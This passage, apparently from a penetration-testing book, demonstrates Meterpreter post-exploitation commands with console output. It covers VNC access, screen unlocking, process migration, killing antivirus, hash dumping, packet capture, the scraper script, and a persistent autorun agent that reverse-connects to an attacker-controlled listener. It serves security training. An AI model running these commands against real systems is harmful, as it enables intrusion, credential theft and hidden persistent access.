Several external Meterpreter scripts can help you to enumerate a system or perform predefined tasks inside the Meterpreter shell. We won’t cover every script here, but we will mention a few of the most notable ones.
Note
The Meterpreter scripts are in the process of being moved to post exploitation modules. We’ll cover both scripts and post exploitation modules in this chapter.
To run a script from the Meterpreter console, enter runscriptname. The script will either execute or provide additional help on how to run it.
Should you want to use an interactive remote GUI on the system, you can use the VNC protocol to tunnel the active desktop communications and interact with the GUI desktop on the target machine. But in some cases, the system may be locked and you may be unable to access it. Never fear: Metasploit has us covered.
In the following example, we issue the run vnc command, which installs a VNC session on the remote system. From there, we launch run screen_unlock to unlock the target machine so that we can view the desktop. As a result, a VNC window should appear, showing us the target desktop.
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.33.129 LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 37888 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\CTDWtQC.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.33.129:4545...
[*] VNC Server session 2 opened (192.168.33.129:4545 -> 192.168.33.130:1091)This will give us a VNC graphical interface to the target machine and allow us to interact through a desktop.
meterpreter > run screen_unlock
[*] OS 'Windows XP (Build 2600, Service Pack 2).' found in known targets
[*] patching...
[*] done!Often, when we are attacking a system and exploiting a service such as Internet Explorer, if the target user closes the browser, the Meterpreter session is also closed and we lose our connection to the target. To avoid this problem, we can use the migrate post exploitation module, shown next, to attempt to migrate the service to a memory space that won’t close when the target closes the browser. By migrating to a different, more stable process, we ensure that the process isn’t closed and we maintain our connection to the system.
meterpreter > run post/windows/manage/migrate
[*] Running module against V-MAC-XP
[*] Current server process: revterp.exe (2436)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)Antivirus software can block certain tasks. During penetration tests, we have seen “smarter” antivirus or host-based intrusion prevention products block our ability to run certain attack vectors. In such cases, we can run the killav script to stop the processes preventing our tasks from running.
meterpreter > run killav
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...
[*] Killing off cmd.exe...Obtaining a copy of the system’s password hashes allows us to run pass-the-hash attacks or to brute force the hash to reveal the plain-text password. We can obtain the password hashes with the run hashdump command:
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY de4b35306c5f595438a2f78f768772d2...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::To see all traffic on a target, we can run a packet recorder. Everything captured by packetrecorder is saved in the .pcap file format to be parsed with a tool such as Wireshark.
In this listing, we run the packetrecorder script with the -i 1 option, which specifies which interface we want to use to perform the packet captures:
meterpreter > run packetrecorder -i 1
[*] Starting Packet capture on interface 1
[*] Packet capture startedThe scraper script enumerates just about everything you could ever want from a system. It will grab the usernames and passwords, download the entire registry, dump password hashes, gather system information, and export the HKEY_CURRENT_USER (HKCU).
meterpreter > run scraper
[*] New session on 192.168.33.130:1095...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\WINDOWS\TEMP\XklepHOU.reg)Meterpreter’s persistence script allows you to inject a Meterpreter agent to ensure that Meterpreter is running even after the target system reboots. If this is a reverse connection, you can set intervals for the target to connect back to the attacker machine. If it’s a bind, you can have it attempt to bind on an interface at a given time.
Warning
If you use this functionality, be sure that you remove it after you’re done. If you forget to do this, any attacker can also gain access to the system without authentication!
In the following listing, we run persistence and tell Windows to autostart the agent at boot time (-X), wait 50 seconds (-i 50) before connection retries, run on port 443 (-p 443), and connect to IP 192.168.33.129. We then establish a listener for the agent at 
with use multi/handler, and after setting a couple of options and running exploit, we see at 
that the connection comes in as expected.
meterpreter >run persistence -X -i 50 -p 443 -r 192.168.33.129[*] Creating a persistent agent: LHOST=192.168.33.129 LPORT=443 (interval=50 onboot=true) [*] Persistent agent script is 316384 bytes long [*] Uploaded the persistent agent to C:\WINDOWS\TEMP\asSnqrlUDRwO.vbs [*] Agent executed with PID 3160 [*] Installing into autorun as HKLM\Software\Microsoft\Windows \CurrentVersion\Run\xEYnaHedooc[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ xEYnaHedooc msf>
use multi/handlerset payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcp msf exploit(handler) >set LPORT 443LPORT => 443 msf exploit(handler) >set LHOST 192.168.33.129LHOST => 192.168.33.129 msf exploit(handler) >exploit[*] Started reverse handler on 192.168.33.129:443 [*] Starting the payload handler... [*] Sending stage (748032 bytes) [*] Meterpreter session 2 opened (192.168.33.129:443 -> 192.168.33.130:1120)
As of this writing, the only way to remove the Meterpreter agent is to delete the registry entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ and remove the VBScript located in C:\WINDOWS\TEMP\. Be sure to document the registry keys and locations (such as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\xEYnaHedooc ) to remove them manually. Generally, you can do this through Meterpreter or drop to a shell and remove it that way. If you feel more comfortable using a GUI, you can use run vnc and remove the script with regedit. (Note that the registry keys will change each time, so make sure that you document where Metasploit adds the registry keys.)